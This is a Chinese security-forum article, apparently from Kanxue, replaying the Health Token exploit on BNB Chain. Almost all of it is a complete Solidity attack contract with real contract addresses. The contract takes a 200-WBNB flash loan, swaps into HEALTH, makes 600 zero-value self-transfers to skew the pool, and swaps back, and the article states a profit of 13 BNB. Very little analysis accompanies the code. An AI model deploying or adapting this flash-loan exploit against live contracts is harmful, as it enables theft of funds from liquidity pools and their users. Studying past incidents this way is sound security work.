本文为看雪论坛优秀文章
看雪论坛作者ID:Catsay
攻击分析
相同数目的Health token应该只能swap出个40000000000000000000
复盘
pragma solidity ^0.8.0;
interface IERC20 {
event Transfer(address indexed from, address indexed to, uint256 value);
event Approval(address indexed owner, address indexed spender, uint256 value);
function totalSupply() external view returns (uint256);
function balanceOf(address account) external view returns (uint256);
function transfer(address to, uint256 amount) external returns (bool);
function allowance(address owner, address spender) external view returns (uint256);
function approve(address spender, uint256 amount) external returns (bool);
function transferFrom(
address from,
address to,
uint256 amount
) external returns (bool);
}
interface Uni_Router_V2 {
function swapExactTokensForTokensSupportingFeeOnTransferTokens(
uint256 amountIn,
uint256 amountOutMin,
address[] memory path,
address to,
uint256 deadline
) external;
}
interface IDPPAdvanced {
function flashLoan(
uint256 baseAmount,
uint256 quoteAmount,
address assetTo,
bytes calldata data
) external;
}
interface IWBNB {
function balanceOf(address account) external view returns (uint256);
function withdraw(uint wad) external;
function deposit() external payable;
function approve(address guy, uint wad) external returns (bool);
}
interface IPancakeRouter {
function getAmountsIn(uint amountOut, address[] memory path) external view returns (uint[] memory amounts);
function swapExactTokensForTokens(
uint amountIn,
uint amountOutMin,
address[] calldata path,
address to,
uint deadline
) external returns (uint[] memory amounts);
function swapExactTokensForTokensSupportingFeeOnTransferTokens(
uint amountIn,
uint amountOutMin,
address[] calldata path,
address to,
uint deadline
) external;
}
interface IHealth {
function balanceOf(address account) external view returns (uint256);
function approve(address spender, uint256 amount) external returns (bool);
function transfer(address recipient, uint256 amount) external returns (bool);
}
interface IPancakePair {
function skim(address to) external;
function sync() external;
}
struct DPPAdvancedCallBackData {
uint256 baseAmount;
uint256 quoteAmount;
}
contract ContractTest{
IERC20 HEALTH = IERC20(0x32B166e082993Af6598a89397E82e123ca44e74E);
IERC20 WBNB = IERC20(0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c);
Uni_Router_V2 uni_pair = Uni_Router_V2(0xF375709DbdE84D800642168c2e8bA751368e8D32);
Uni_Router_V2 uni_router = Uni_Router_V2(0x10ED43C718714eb63d5aA57B78B54704E256024E);
address public constant dodo = 0x0fe261aeE0d1C4DFdDee4102E82Dd425999065F4;
function testExp() external{
WBNB.approve(address(uni_router), type(uint).max);
HEALTH.approve(address(uni_router),type(uint).max);
uint256 borrown_wbnb_amt = 200 * 1e18;
DPPAdvancedCallBackData memory callbackData;
callbackData.baseAmount = borrown_wbnb_amt;
callbackData.quoteAmount = 0;
bytes memory data = abi.encode(callbackData);
IDPPAdvanced(dodo).flashLoan(borrown_wbnb_amt,0,address(this),data);
}
fallback() external payable {
}
function DPPFlashLoanCall(
address sender,
uint256 baseAmount,
uint256 quoteAmount,
bytes calldata data
) external {
WBNBToHEALTH();
for(uint i = 0; i < 600; i++){
HEALTH.transfer(address(this), 0);
}
HEALTHToWBNB();
WBNB.transfer(dodo, 200 * 1e18);
}
function WBNBToHEALTH() internal{
address[] memory path = new address[](2);
path[0] = address(WBNB);
path[1] = address(HEALTH);
uni_router.swapExactTokensForTokensSupportingFeeOnTransferTokens(
WBNB.balanceOf(address(this)),
0,
path,
address(this),
block.timestamp
);
}
function HEALTHToWBNB() internal{
address[] memory path = new address[](2);
path[0] = address(HEALTH);
path[1] = address(WBNB);
uni_router.swapExactTokensForTokensSupportingFeeOnTransferTokens(
HEALTH.balanceOf(address(this)),
0,
path,
address(this),
block.timestamp
);
}
成功获利13个BNB。
看雪ID:Catsay
https://bbs.pediy.com/user-home-642281.htm
# 往期推荐
1、frida入门
5、逆向记录
球分享
球点赞
球在看
点击“阅读原文”,了解更多!
原文始发于微信公众号(看雪学苑):区块链安全学习 – Health Token